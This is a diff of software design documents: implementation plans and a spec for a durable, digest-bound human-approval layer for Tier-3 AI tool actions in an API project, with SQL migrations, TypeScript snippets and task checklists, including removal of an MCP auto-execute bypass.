+| `apps/api/src/routes/approvals.ts` | Modify | Decide handler: intent CAS + sibling expiry + assurance gate |
+| `apps/api/src/jobs/intentOutboxPublisher.ts` | Create | 5s poller → BullMQ |
+| `apps/api/src/jobs/intentReleaseWorker.ts` | Create | Revalidate + execute + stale-executing sweep |
+| `apps/api/src/jobs/approvalExpiryReaper.ts` | Modify | Also sweep expired intents |
+| `apps/api/src/services/aiAgentSdk.ts` | Modify | T3 flow intent-backed |
+| `apps/api/src/services/permissions.ts` (+ role seeds) | Modify | `approvals:decide` permission |
+| Contract tests | Modify | `rls-coverage`, `tenantCascade` registration |
+
+---
+
+### Task 1: Schema + migration + contract-test registration
+
+**Files:**
+- Create: `apps/api/migrations/2026-07-18-action-intents.sql`
+- Create: `apps/api/src/db/schema/actionIntents.ts`
+- Modify: `apps/api/src/db/schema/approvals.ts`, schema barrel
+- Modify: `apps/api/src/services/tenantCascade.ts` (`CORE_ORG_CASCADE_DELETE_ORDER` — insert `action_intents` alphabetically; verify FK direction: `intent_outbox` cascades from `action_intents`, `approval_requests.intent_id` is ON DELETE CASCADE so no ordering entry needed for it)
+- Modify: `apps/api/src/__tests__/integration/rls-coverage.integration.test.ts` (register `action_intents` as shape-1 auto-discovered — verify; add `intent_outbox` to the INTENTIONAL_UNSCOPED documentation list)
+- Test: `apps/api/src/db/schema/actionIntents.test.ts` + migration-application test following `migration-m365-control-plane-foundation.test.ts` pattern
+
+**Interfaces produced (used by all later tasks):**
+- Drizzle exports `actionIntents`, `intentOutbox`; enums `actionIntentStatusEnum` (`pending_approval|approved|executing|completed|failed|rejected|expired|cancelled`), `actionIntentSourceEnum` (`chat|mcp_api`), `intentOutboxEventEnum` (`intent_created|intent_approved`).
+- `approvalRequests` gains `intentId: uuid('intent_id')` (FK `action_intents.id` ON DELETE CASCADE, indexed) and `boundArgumentDigest: char('bound_argument_digest', { length: 64 })`, both nullable.
+
+- [ ] **Step 1: Write the failing schema test** — asserts column names/types on the Drizzle objects (12 immutable content fields, lifecycle fields, checks list), enum members exactly as above, and that `approvalRequests.intentId` exists.
+- [ ] **Step 2: Run** `pnpm --filter @breeze/api test -- actionIntents` → FAIL (module not found).
+- [ ] **Step 3: Write the migration.** Content requirements (all idempotent — `IF NOT EXISTS` / `DO $$` / pg_policies checks):
+
+```sql
+-- 2026-07-18-action-intents.sql
+CREATE TABLE IF NOT EXISTS action_intents (
+  id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+  org_id UUID NOT NULL REFERENCES organizations(id),
+  partner_id UUID REFERENCES partners(id),
+  requested_by_user_id UUID REFERENCES users(id) ON DELETE SET NULL,
+  requesting_api_key_id UUID REFERENCES api_keys(id) ON DELETE SET NULL,
+  source TEXT NOT NULL CHECK (source IN ('chat','mcp_api')),
+  requesting_client_label VARCHAR(255),
+  action_name VARCHAR(255) NOT NULL,
+  action_version INTEGER NOT NULL DEFAULT 1,
+  arguments JSONB NOT NULL DEFAULT '{}',
+  argument_digest CHAR(64) NOT NULL,
+  target_summary TEXT NOT NULL,
+  impact_summary TEXT NOT NULL,
+  reason TEXT,
+  risk_tier SMALLINT NOT NULL,
+  connection_id UUID,
+  tenant_id UUID,
+  idempotency_key TEXT NOT NULL,
+  correlation_id UUID NOT NULL,
+  status TEXT NOT NULL DEFAULT 'pending_approval'
+    CHECK (status IN ('pending_approval','approved','executing','completed','failed','rejected','expired','cancelled')),
+  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
+  expires_at TIMESTAMPTZ NOT NULL,
+  decided_at TIMESTAMPTZ,
+  decided_by_user_id UUID REFERENCES users(id) ON DELETE SET NULL,
+  decided_assurance_level SMALLINT,
+  decided_via TEXT,
+  executed_at TIMESTAMPTZ,
+  result JSONB,
+  error_code TEXT,
+  CONSTRAINT action_intents_one_actor_chk
+    CHECK ((requested_by_user_id IS NULL) <> (requesting_api_key_id IS NULL))
+);
+CREATE UNIQUE INDEX IF NOT EXISTS action_intents_org_idem_uniq
+  ON action_intents (org_id, idempotency_key);
+CREATE INDEX IF NOT EXISTS action_intents_org_status_idx
+  ON action_intents (org_id, status, expires_at);
+```
+
+plus (same file): the immutability trigger —
+
+```sql
+CREATE OR REPLACE FUNCTION action_intents_block_content_update() RETURNS trigger AS $$
+BEGIN
+  IF NEW.org_id IS DISTINCT FROM OLD.org_id
+     OR NEW.requested_by_user_id IS DISTINCT FROM OLD.requested_by_user_id
+     OR NEW.requesting_api_key_id IS DISTINCT FROM OLD.requesting_api_key_id
+     OR NEW.source IS DISTINCT FROM OLD.source
+     OR NEW.action_name IS DISTINCT FROM OLD.action_name
+     OR NEW.action_version IS DISTINCT FROM OLD.action_version
+     OR NEW.arguments IS DISTINCT FROM OLD.arguments
+     OR NEW.argument_digest IS DISTINCT FROM OLD.argument_digest
+     OR NEW.risk_tier IS DISTINCT FROM OLD.risk_tier
+     OR NEW.idempotency_key IS DISTINCT FROM OLD.idempotency_key
+     OR NEW.correlation_id IS DISTINCT FROM OLD.correlation_id
+     OR NEW.created_at IS DISTINCT FROM OLD.created_at
+     OR NEW.expires_at IS DISTINCT FROM OLD.expires_at THEN
+    RAISE EXCEPTION 'action_intents content is immutable';
+  END IF;
+  RETURN NEW;
+END $$ LANGUAGE plpgsql;
+DO $$ BEGIN
+  IF NOT EXISTS (SELECT 1 FROM pg_trigger WHERE tgname = 'action_intents_immutable_trg') THEN
+    CREATE TRIGGER action_intents_immutable_trg BEFORE UPDATE ON action_intents
+      FOR EACH ROW EXECUTE FUNCTION action_intents_block_content_update();
+  END IF;
+END $$;
+```
+
+the RLS block (copy the enable/force/policy structure from `2026-07-13-m365-control-plane-foundation.sql`; policy = system OR `breeze_has_org_access(org_id)`), the `intent_outbox` table —
+
+```sql
+CREATE TABLE IF NOT EXISTS intent_outbox (
+  id BIGSERIAL PRIMARY KEY,
+  intent_id UUID NOT NULL REFERENCES action_intents(id) ON DELETE CASCADE,
+  event_type TEXT NOT NULL CHECK (event_type IN ('intent_created','intent_approved')),
+  payload JSONB NOT NULL DEFAULT '{}',
+  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
+  published_at TIMESTAMPTZ,
+  publish_attempts INTEGER NOT NULL DEFAULT 0
+);
+CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx
+  ON intent_outbox (created_at) WHERE published_at IS NULL;
+```
+
+and the `approval_requests` ALTER (`ADD COLUMN IF NOT EXISTS intent_id UUID REFERENCES action_intents(id) ON DELETE CASCADE`, `ADD COLUMN IF NOT EXISTS bound_argument_digest CHAR(64)`, index on `intent_id`; extend/add the at-most-one-source CHECK across `execution_id`/`elevation_request_id`/`intent_id` with `DROP CONSTRAINT IF EXISTS` + re-add — first check the shipped schema for an existing constraint name). NOTE: use `gen_random_uuid()` (pgcrypto-free, Postgres 13+ builtin) — never `gen_random_bytes` (known footgun).
+
+- [ ] **Step 4: Write the Drizzle schema** mirroring the SQL exactly (follow `db/schema/elevations.ts` style for enums/indexes; put both tables in `actionIntents.ts`); wire barrel export; add the two columns to `approvals.ts`.
+- [ ] **Step 5: Run schema tests + `pnpm db:check-drift`** (needs local DB per Development Commands) → both green.
+- [ ] **Step 6: Register contract tests.** `tenantCascade.ts`: insert `'action_intents'` alphabetically into `CORE_ORG_CASCADE_DELETE_ORDER`. RLS coverage test: confirm shape-1 auto-discovery picks up `action_intents` (it has org_id — run the integration file if a local :5433 DB is available; otherwise rely on CI Integration Tests and say so in the report); add `intent_outbox` to the documented system-scoped list.
+- [ ] **Step 7: Commit** — `git add apps/api/migrations/2026-07-18-action-intents.sql apps/api/src/db/schema/actionIntents.ts apps/api/src/db/schema/actionIntents.test.ts apps/api/src/db/schema/approvals.ts <barrel> apps/api/src/services/tenantCascade.ts apps/api/src/__tests__/integration/rls-coverage.integration.test.ts` ; `git commit -m "feat(intents): add action_intents schema with immutable content and outbox"`
+
+---
+
+### Task 2: Canonicalization + digest
+
+**Files:** Create `apps/api/src/services/actionIntents/canonicalize.ts` + test.
+
+**Interfaces produced:**
+- `canonicalizeArguments(input: Record<string, unknown>): string` — deterministic JSON: recursively sorted object keys, arrays order-preserved, `undefined` properties dropped, throws `TypeError` on functions/symbols/bigints/circular refs, numbers via default JSON serialization.
+- `computeArgumentDigest(canonical: string): string` — `createHash('sha256').update(canonical, 'utf8').digest('hex')`.
+
+- [ ] **Step 1: Failing tests**: key-order invariance (`{b:1,a:2}` ≡ `{a:2,b:1}` → same digest); nested objects sorted; array order preserved (different order → different digest); `undefined` dropped ≡ absent; circular ref throws; digest is 64 lowercase hex.
+- [ ] **Step 2–4: Red → implement → green.** Implementation core:
+
+```ts
+function sortValue(value: unknown, seen: WeakSet<object>): unknown {
+  if (value === null || typeof value !== 'object') {
+    if (typeof value === 'function' || typeof value === 'symbol' || typeof value === 'bigint') {
+      throw new TypeError('argument value is not JSON-serializable');
+    }
+    return value;
+  }
+  if (seen.has(value as object)) throw new TypeError('circular argument structure');
+  seen.add(value as object);
+  if (Array.isArray(value)) return value.map((item) => sortValue(item, seen));
+  const out: Record<string, unknown> = {};
+  for (const key of Object.keys(value as Record<string, unknown>).sort()) {
+    const item = (value as Record<string, unknown>)[key];
+    if (item !== undefined) out[key] = sortValue(item, seen);
+  }
+  return out;
+}
+export function canonicalizeArguments(input: Record<string, unknown>): string {
+  return JSON.stringify(sortValue(input, new WeakSet()));
+}
+```
+
+- [ ] **Step 5: Commit** — `feat(intents): add argument canonicalization and digest`
+
+---
+
+### Task 3: `approvals:decide` permission
+
+**Files:** Modify `apps/api/src/services/permissions.ts` (and wherever role→permission seeds live — READ that file first and follow the existing permission-definition + role-seeding pattern exactly); test alongside.
+
+**Behavioral contract (binding):** a new permission key `approvals:decide`; granted by default to the same roles that hold org-admin and partner-admin capability today (match how an existing admin-only permission is seeded); checkable per-org via the existing permission helpers used by `canAccessOrg`-style checks. Produce a helper `userCanDecideApprovals(userPerms, orgId): boolean` exported wherever sibling helpers live.
+
+- [ ] TDD steps: failing test (admin role has it, technician-without-grant doesn't, org scoping respected) → implement → green → commit `feat(intents): add approvals:decide permission`.
+
+---
+
+### Task 4: Intent service (create, CAS, fan-out, idempotency)
+
+**Files:** Create `apps/api/src/services/actionIntents/intentService.ts`, `apps/api/src/services/actionIntents/metrics.ts` (pattern-match `m365ControlPlane/readActionMetrics.ts`: counter `breeze_action_intents_total{source,action,outcome}` + audit helper writing `action_intent.*` events); tests.
+
+**Interfaces produced (used by Tasks 5–8 and Plan 2):**
+
+```ts
+export interface CreateActionIntentInput {
+  toolName: string;
+  input: Record<string, unknown>;
+  reason?: string;
+  source: 'chat' | 'mcp_api';
+  requestingClientLabel?: string;
+  idempotencyKey?: string;          // MCP callers; derived for chat
+  orgId?: string;                   // resolved via resolveWritableToolOrgId when absent
+}
+export type ActionIntentSnapshot = {
+  id: string; status: ActionIntentStatus; actionName: string; argumentDigest: string;
+  source: 'chat' | 'mcp_api'; expiresAt: Date; result: unknown; errorCode: string | null;
+  approvalRequestIds: string[];
+};
+export async function createActionIntent(auth: AuthContext, input: CreateActionIntentInput): Promise<ActionIntentSnapshot>;
+export async function getActionIntent(auth: AuthContext, intentId: string): Promise<ActionIntentSnapshot | null>;
+export async function cancelActionIntent(auth: AuthContext, intentId: string): Promise<{ ok: boolean; status: ActionIntentStatus }>;
+export async function transitionIntent(intentId: string, from: ActionIntentStatus | ActionIntentStatus[], to: ActionIntentStatus, patch?: Partial<...lifecycle cols...>): Promise<boolean>; // the CAS primitive, system context
+```
+
+**Behavior (spec §4, binding):** tier resolution via `getToolTier` + `checkGuardrails` (reject non-T3 with a typed error; T4 refused); canonicalize+digest; summaries = tool description first sentence + top-level arg keys with values truncated to 80 chars; idempotency insert with `onConflictDoNothing` + re-select returning the existing snapshot; approver resolution (org users with `approvals:decide` via Task 3 helper, excluding requester; sole-operator and no-approver branches per spec §4.4 — sole-operator approval row carries `boundArgumentDigest` and a marker the decide handler can read: reuse `isRecursive`? NO — add nothing; the decide handler recomputes sole-operator status from the intent's requester vs decider, see Task 5); intent + fan-out rows + `intent_created` outbox row in ONE `db.transaction` under the caller's RLS context EXCEPT the outbox insert which is system-scope — run the whole creation inside `withDbAccessContext` and insert outbox via the same transaction (outbox has no RLS, plain insert works); push notifications AFTER commit (best-effort, like `aiAgentSdk.ts:530-560`'s pattern).
+
+- [ ] TDD steps: failing tests for — T2 tool rejected; T4 refused; digest stability; idempotent double-create returns same id; fan-out excludes requester; sole-operator single row; no-approver → cancelled + `no_eligible_approvers`; outbox row written in-txn (assert via mocked db capture); CAS transition zero-row semantics. Then implement → green → `tsc` clean → commit `feat(intents): add intent service with approver fan-out`.
+
+---
+
+### Task 5: Decide-handler extension (`routes/approvals.ts`)
+
+**Files:** Modify `apps/api/src/routes/approvals.ts` + its test file.
+
+**Behavior (binding):** when the decided row has `intentId`: (1) sole-operator enforcement — if the approval's user is the intent's `requested_by_user_id`, require `decidedAssuranceLevel >= 3` (the step-up machinery already computes this; refuse with the existing StepUpRequiredError flow otherwise) and audit `action_intent.self_approved_sole_operator`; (2) in the same transaction as the approval CAS: intent CAS `pending_approval → approved|rejected` with decider fields, expire sibling approval rows (`status='pending' AND intent_id=X AND id<>this` → `expired`), insert `intent_approved` outbox row on approval; (3) digest check — refuse decision if `bound_argument_digest` ≠ intent's `argument_digest` (defense-in-depth, audited). Rows without `intentId` behave exactly as today (regression tests must pass unmodified).
+
+- [ ] TDD: failing tests for the four behaviors + first-wins race (second decider gets "Already decided") + non-intent rows untouched → implement → green → commit `feat(intents): bind approval decisions to intents`.
+
+---
+
+### Task 6: Outbox publisher + expiry sweeps
+
+**Files:** Create `apps/api/src/jobs/intentOutboxPublisher.ts`; modify `apps/api/src/jobs/approvalExpiryReaper.ts` (add intent sweep) or create sibling `intentExpiryReaper.ts` if the existing file's shape resists extension — implementer's call, report which; tests for both. READ `approvalExpiryReaper.ts` fully first; mirror its BullMQ registration, 30s cadence, `FOR UPDATE SKIP LOCKED` CTE, batch cap, and `withSystemDbAccessContext` usage.
+
+**Behavior (binding):** publisher — 5s repeatable job; claim ≤200 unpublished rows; for each, enqueue to queue `action-intents` with jobId `intent-<eventType>-<intentId>` and mark `published_at`, increment `publish_attempts`; rows with `publish_attempts > 5` logged at error level and skipped (alarm surface). Expiry sweep — `pending_approval|approved` past `expires_at` → `expired` (CAS), linked pending approval rows → `expired`, audit per intent; stale-executing sweep — `executing` where `executed_at IS NULL AND decided_at < now() - interval '20 minutes'` → `failed` + `error_code='execution_lost'` (20 min = comfortably ≥ 2× the longest tool timeout, per spec §8; keep as one constant beside the expiry constants).
+
+- [ ] TDD: publisher idempotence (re-run doesn't double-enqueue thanks to jobId dedupe), attempts increment, expiry CAS, stale-executing flip → implement → green → commit `feat(intents): publish outbox and sweep expiries`.
+
+---
+
+### Task 7: Actor context + release worker
+
+**Files:** Create `apps/api/src/services/actionIntents/actorContext.ts`, `apps/api/src/jobs/intentReleaseWorker.ts`; tests.
+
+**`buildAuthContextForIntent(intent): Promise<AuthContext | null>`** — for `requested_by_user_id`: load user, refuse if disabled/deleted, rebuild permissions/org/site closures by calling the SAME functions `middleware/auth.ts` uses (READ it and extract/reuse; if the logic is inline-only, extract a shared helper in `middleware/auth.ts` exported for both — do not fork the logic); for `requesting_api_key_id`: load key, refuse if revoked/expired, rebuild scope-based context matching `apiKeyAuthMiddleware`. Returns null (refusal) → intent `failed: actor_invalid`.
+
+**Release worker (binding, spec §5):** consumes `intent_approved` jobs from queue `action-intents`; CAS `approved → executing` (zero rows → exit silently); revalidation chain (each failure → CAS `executing → failed` with the exact codes): approval row still approved + digest equality (`digest_mismatch`); tool exists + `getToolTier` not increased (`tier_escalated`); `buildAuthContextForIntent` non-null (`actor_invalid`); org active (`org_inactive`). Then `executeTool(toolName, args, auth)` via the existing dispatch (this creates the ledger row + audit as normal); cap result to 64 KiB (`Buffer.byteLength(JSON.stringify(result))`); CAS `executing → completed|failed` + metrics/audit.
+
+- [ ] TDD: revalidation matrix (each stop condition), double-release no-op, result cap, ledger row created → implement → green → commit `feat(intents): durable release worker with revalidation`.
+
+---
+
+### Task 8: Chat SDK integration
+
+**Files:** Modify `apps/api/src/services/aiAgentSdk.ts` (the T3 block at ~lines 489–620: approval-row insert at 530, `waitForApproval` calls at 325/598) + its tests.
+
+**Behavior (binding, spec §6.1):** replace the direct `approvalRequests` insert with `createActionIntent(auth, {toolName, input, source: 'chat', ...})`; keep the 300s wait window (chat intent expiry = 5 min aligns); `waitForApproval` is REPLACED at these call sites by a new `waitForIntentDecision(intentId, timeoutMs, signal)` (same poll/backoff shape as `aiAgent.ts:300`'s loop but reading `action_intents.status`; put it in `intentService.ts`); on `approved` while session alive: session performs CAS `approved → executing` itself — if the CAS loses (worker got it), poll until terminal and use the stored result; then execute inline exactly as today and CAS `executing → completed|failed`. On timeout: leave the intent pending (it can still be approved and executed durably later — this is the new capability); the chat message says approval is still pending and results will be available in the session/audit. The synthetic-helper skip path at line ~270 keeps its current behavior (helper contexts bypass unchanged). Existing `ai_tool_executions` mirroring: the decide handler no longer mirrors executions for intent-linked rows (Task 5 replaced that with intent CAS); the session/worker owns ledger writes.
+
+- [ ] TDD: intent created with source chat + 5min expiry; fast-path inline execution wins CAS; session-lost path completes via worker (simulate by letting worker CAS first); timeout leaves pending; helper-context path untouched → implement → green (full `aiAgentSdk` + `aiAgent` test files) → commit `feat(intents): back chat tier-3 approvals with durable intents`.
+
+---
+
+### Task 9: Approval UI payload fields + verification gate
+
+**Files:** Modify the approval push builder (`services/expoPush.ts` `buildApprovalPush`) and the web approval detail data source (`routes/approvals.ts` GET `/:id` — include intent fields when linked: org name, action name/version, target/impact summaries, source, client label, expiry); web component that renders approval detail (find via `grep -rn "approval" apps/web/src/components --include='*.tsx' -l` and extend the detail fields; follow existing i18n patterns — new strings in ALL locale files, en + de-DE + es-419 + fr-FR + pt-BR per the key-parity gate).
+
+- [ ] Steps: extend GET payload + push payload (tests) → web detail fields + locale keys (run the web i18n parity test) → full gate: `pnpm --filter @breeze/api test`, `pnpm --filter @breeze/web test`, tsc both, eslint changed files, `git diff --check` → commit `feat(intents): surface intent context in approval UI` → run `/code-review` (one round).
+
+---
+
+## Self-Review Notes
+
+- Task 5 removes the decide-handler's `ai_tool_executions` mirroring only for intent-linked rows; legacy rows (PAM bridge, non-intent AI rows during rollout) keep the existing mirror — Task 8's tests must cover both.
+- `intent_outbox` insert inside the caller-context transaction is legal because the table has no RLS (system table); the RLS coverage test documents it as INTENTIONAL_UNSCOPED (Task 1 Step 6).
+- The CAS primitive `transitionIntent` (Task 4) is consumed by Tasks 5, 6, 7, 8 — one implementation, no per-file variants.
+- Cascade note: `approval_requests.intent_id` and `intent_outbox.intent_id` are both ON DELETE CASCADE, so `CORE_ORG_CASCADE_DELETE_ORDER` needs only `action_intents` itself (children resolve via FK cascade) — but verify `tenantCascade.integration.test.ts`'s five properties still hold after insertion.

--- a/docs/superpowers/plans/2026-07-18-action-intents-core.md
+++ b/docs/superpowers/plans/2026-07-18-action-intents-core.md
@@ -182,12 +182,20 @@ function sortValue(value: unknown, seen: WeakSet<object>): unknown {
   }
   if (seen.has(value as object)) throw new TypeError('circular argument structure');
   seen.add(value as object);
-  if (Array.isArray(value)) return value.map((item) => sortValue(item, seen));
-  const out: Record<string, unknown> = {};
-  for (const key of Object.keys(value as Record<string, unknown>).sort()) {
-    const item = (value as Record<string, unknown>)[key];
-    if (item !== undefined) out[key] = sortValue(item, seen);
+  // DFS path-marking: remove on backtrack so `seen` holds only ancestors on the
+  // current path. A shared (non-cyclic) object reused twice must NOT throw.
+  let out: unknown;
+  if (Array.isArray(value)) {
+    out = value.map((item) => sortValue(item, seen));
+  } else {
+    const obj: Record<string, unknown> = {};
+    for (const key of Object.keys(value as Record<string, unknown>).sort()) {
+      const item = (value as Record<string, unknown>)[key];
+      if (item !== undefined) obj[key] = sortValue(item, seen);
+    }
+    out = obj;
   }
+  seen.delete(value as object);
   return out;
 }
 export function canonicalizeArguments(input: Record<string, unknown>): string {

--- a/docs/superpowers/plans/2026-07-18-action-intents-mcp-cutover.md
+++ b/docs/superpowers/plans/2026-07-18-action-intents-mcp-cutover.md
@@ -1,0 +1,97 @@
+# Action Intents MCP Cutover (Plan 2 of 2) Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Close the external MCP Tier-3 bypass: API-key callers can request T3 work (durable intent) but never auto-execute it; add `get_action_status` / `cancel_action`; delete the auto-execute path.
+
+**Architecture:** `routes/mcpServer.ts`'s T3 branch is rewired from direct `runTier3ToolLifecycle` execution to `createActionIntent(source: 'mcp_api')` returning a structured `pending_approval` result; two new built-in MCP tools expose the intent lifecycle; approval/execution happen entirely through Plan 1's machinery.
+
+**Tech Stack:** Hono, Plan 1's `intentService`, Vitest.
+
+**Prerequisite:** Plan 1 (`2026-07-18-action-intents-core.md`) fully merged. **This is a BREAKING CHANGE release** for API-key integrations using `ai:execute` on Tier-3 tools — hard cutover, no compatibility flag (locked decision).
+
+## Global Constraints
+
+- `ai:execute` scope = may CREATE T3 intents; `ai:execute_admin` + `isExecuteToolAllowedInProd` continue to gate WHICH tools may be requested. T1/T2 behavior, RBAC checks, and rate limits unchanged.
+- T4 remains blocked outright — never intent-eligible.
+- The deleted comment/behavior "MCP server auto-executes Tier 3 tools without approval" (`mcpServer.ts:996-997` area) must not survive anywhere, including docs.
+- MCP intents: source `mcp_api`, 24h expiry, caller-supplied `idempotencyKey` honored (same key → same intent, no duplicate side effect).
+- Status mapping (spec §10.4, exact): intent `pending_approval`→`pending_approval`; `approved|executing`→`in_progress`; `completed`→`completed` (+sanitized result); `failed`→`failed` (+errorCode); `rejected`→`rejected`; `expired`→`expired`; `cancelled`→`cancelled`.
+- `cancel_action`: requester (same API key or user) or an eligible approver only; CAS from `pending_approval|approved` only.
+- Worktree may contain unrelated concurrent WIP — stage explicitly, never `git add -A`.
+
+## File Map
+
+| File | Action | Responsibility |
+|---|---|---|
+| `apps/api/src/routes/mcpServer.ts` | Modify | T3 rewiring; register 2 built-in tools |
+| `apps/api/src/routes/mcpServer.test.ts` (or sibling test files) | Modify | Cutover + new-tool tests |
+| `docs/…` release/API docs + `apps/docs` MCP page | Modify | Breaking-change documentation |
+| `apps/api/src/__tests__/integration/actionIntentsMcp.integration.test.ts` | Create | End-to-end round-trip |
+
+---
+
+### Task 1: Rewire `tools/call` Tier-3 to intents
+
+**Files:** Modify `apps/api/src/routes/mcpServer.ts` (`handleToolsCall` T3 branch, currently gating at lines ~954-970 then executing via `runTier3ToolLifecycle` at ~1061; the lifecycle helper at ~1170 keeps serving T1/T2 ledger duties if it does so today — READ the function first and preserve non-T3 behavior exactly). Tests alongside.
+
+**Behavior (binding):**
+- After the existing scope/RBAC/allowlist/rate-limit gates pass for a T3 tool: call `createActionIntent(auth, { toolName, input: args, source: 'mcp_api', requestingClientLabel: <api key label/client name already available in ctx>, idempotencyKey: <optional 'idempotencyKey' member of tools/call arguments, stripped before arg canonicalization>, reason: <optional 'reason' member, same stripping> })`.
+- Success → JSON-RPC result with structured content:
+
+```json
+{
+  "state": "pending_approval",
+  "intentId": "<uuid>",
+  "approvalRequestIds": ["<uuid>"],
+  "expiresAt": "<iso>",
+  "note": "Tier-3 actions require human approval. Poll get_action_status or cancel with cancel_action."
+}
+```
+
+- Idempotent replay (existing intent returned): map the CURRENT status through the Global Constraints table (a replay of a completed intent returns `completed` + result — no re-execution).
+- `no_eligible_approvers` → JSON-RPC error with that code and a human sentence.
+- Delete the auto-execute branch and its comment. `ai:execute` scope checks stay where they are (they now gate intent creation).
+
+- [ ] **Step 1: Write failing tests** (extend the existing mcpServer test fixtures): T3 call returns pending_approval envelope + creates an intent row (mock `intentService`); T3 call NEVER reaches the tool handler; idempotent replay returns mapped current status; T4 still blocked; T1/T2 paths byte-identical behavior (regression: existing tests pass unmodified); scope errors unchanged.
+- [ ] **Step 2: Run** the mcpServer test files → FAIL. **Step 3: Implement.** **Step 4: Green + tsc + eslint.**
+- [ ] **Step 5: Commit** — `feat(mcp)!: tier-3 tools create durable intents instead of auto-executing`
+
+---
+
+### Task 2: `get_action_status` + `cancel_action` MCP tools
+
+**Files:** Modify `apps/api/src/routes/mcpServer.ts` (register in `handleToolsList` + `handleToolsCall` as built-in tools, visible at `ai:read` scope); tests.
+
+**Contracts (binding):**
+- `get_action_status({ intentId })` → `{ state, result?, errorCode?, expiresAt, actionName }` per the status mapping; unknown/foreign-org intent → JSON-RPC error `not_found` (RLS + explicit org check via `getActionIntent(auth, id)` — no existence oracle across orgs).
+- `cancel_action({ intentId })` → `{ state: 'cancelled' }` on success; authorization: the intent's requesting API key / user, or a user holding `approvals:decide` for the org; otherwise `not_found` (same non-oracle rule); CAS failure (already terminal/executing) → error `not_cancellable` with current state.
+
+- [ ] TDD: list exposure at ai:read; status mapping table-driven across all 8 intent statuses; cross-org returns not_found; cancel authz matrix; cancel race with release worker (CAS loses → not_cancellable) → implement → green → commit `feat(mcp): add get_action_status and cancel_action tools`.
+
+---
+
+### Task 3: End-to-end integration test
+
+**Files:** Create `apps/api/src/__tests__/integration/actionIntentsMcp.integration.test.ts` (real-Postgres placement per repo convention; runs under the Integration Tests job).
+
+**Scenario (binding):** seed org + admin approver + API key with `ai:execute`; T3 `tools/call` → assert `pending_approval` + intent row + approval fan-out rows; decide via the approvals route as the admin → intent `approved` + outbox row; run the release worker inline (invoke its processor function directly rather than a live BullMQ worker) → intent `completed`; `get_action_status` returns `completed` with sanitized result; duplicate `tools/call` with the same idempotencyKey returns `completed` without a second ledger row; a second scenario covers deny → `rejected`, and cancel-before-decision → `cancelled`.
+
+- [ ] TDD steps → green locally against the :5433 integration DB (or document CI-only if unavailable) → commit `test(mcp): prove intent round-trip end to end`.
+
+---
+
+### Task 4: Breaking-change documentation + verification gate
+
+**Files:** Update the MCP/API docs page under `apps/docs/` that documents `ai:execute` semantics (grep for `ai:execute` in apps/docs); add a release-notes stub `docs/` entry or the location the `release` skill consumes, stating: Tier-3 via API key now returns `pending_approval`; poll `get_action_status`; approvals happen in the Breeze UI/mobile; `ai:execute` no longer auto-executes.
+
+- [ ] Steps: docs edits → docs build green → full gate (`pnpm --filter @breeze/api test`, tsc, eslint, `git diff --check`) → commit `docs(mcp)!: document tier-3 approval requirement for API keys` → `/code-review` (one round).
+
+---
+
+## Self-Review Notes
+
+- Task 1 must NOT touch T1/T2 dispatch or the scope model — regression suites are the guard.
+- The `idempotencyKey`/`reason` members are stripped from `args` BEFORE canonicalization so they never affect the digest (and never reach the tool handler).
+- The non-oracle rule (`not_found` for both nonexistent and unauthorized) applies to both new tools — matches the repo's LIST/RLS defense-in-depth conventions.
+- Release timing: merge Plan 1 → at least one production deploy cycle → merge Plan 2 (intents must exist before callers are pointed at them). Both plans can land in the same release for self-hosters; the ordering constraint is within-deploy migration-before-API, which autoMigrate already guarantees.

--- a/docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+++ b/docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
@@ -1,0 +1,259 @@
+# Action Intents & Durable Approval Layer — Design
+
+**Date:** 2026-07-18
+**Status:** Approved design, pre-implementation
+**Parent:** `2026-07-13-breeze-m365-control-plane-design.md` §9–§10, §17 stage 3
+**Relation to existing code:** extends `approval_requests` (`db/schema/approvals.ts`) and the PAM
+elevation patterns (`db/schema/elevations.ts`); rewires `aiAgentSdk.ts` T3 flow and
+`routes/mcpServer.ts` T3 gating.
+
+## 1. Purpose
+
+Give Breeze a durable, digest-bound intent + approval capability for every Tier-3 tool
+action, and close the external MCP bypass in which `ai:execute` API-key scope
+auto-executes Tier-3 work with no human gate (`mcpServer.ts` — "Approval flow is for
+interactive UI only"). v1 consumers are **all existing Tier-3 tools** (scripts,
+commands, registry deletes, and current T3 M365/Google tools). Future M365 mutation
+executors (`customer-graph-actions`, Exchange PowerShell) plug in as additional action
+sources with no new approval machinery.
+
+Decisions locked during brainstorming:
+- **Generic layer**, all current T3 tools as first consumers — not M365-scoped.
+- **Hard cutover** for the MCP bypass: the auto-execute path is deleted in one release;
+  no legacy flag, no per-key grandfathering. Release-notes callout for self-hosters.
+- **Org approver pool**: any user with the new `approvals:decide` permission and access
+  to the intent's org may decide; first decision wins. The requester may not approve
+  their own intent…
+- …except **sole-operator step-up self-approval**: when the eligible approver set is
+  exactly the requester, self-approval is allowed at assurance level ≥ 3
+  (`webauthn_platform` or `mobile_hw_key`), audited as `self_approved_sole_operator`.
+
+## 2. Scope and non-goals
+
+**In scope:** `action_intents` + `intent_outbox` tables (+ migration, RLS, cascade
+registration); intent creation service with canonicalization + digest; approver
+fan-out through `approval_requests` (new nullable `intent_id` FK); intent state
+machine with CAS transitions and expiry reaping; transactional outbox + BullMQ
+publisher; durable release worker with pre-execution revalidation; chat SDK
+integration; MCP `pending_approval` response contract + `get_action_status` /
+`cancel_action` tools; approval-detail UI additions; audit + metrics.
+
+**Non-goals:** new approval UI subsystems (web queue, push, WebAuthn step-up are
+reused as-is); M365 mutation actions themselves (stage 5); per-org configurable
+approval policies (a PAM-rules-style auto-decision engine for intents is future work —
+v1 is "every T3 intent requires a human decision"); Tier-2 policy gating changes; T4
+stays blocked outright; webhooks for status delivery (poll/tool only in v1).
+
+## 3. Data model
+
+### 3.1 `action_intents` (new; tenancy shape 1, org axis)
+
+Identity / attribution:
+- `id` uuid PK; `org_id` NOT NULL FK; `partner_id` denormalized (PAM elevations
+  pattern); `requested_by_user_id` nullable FK; `requesting_api_key_id` nullable FK —
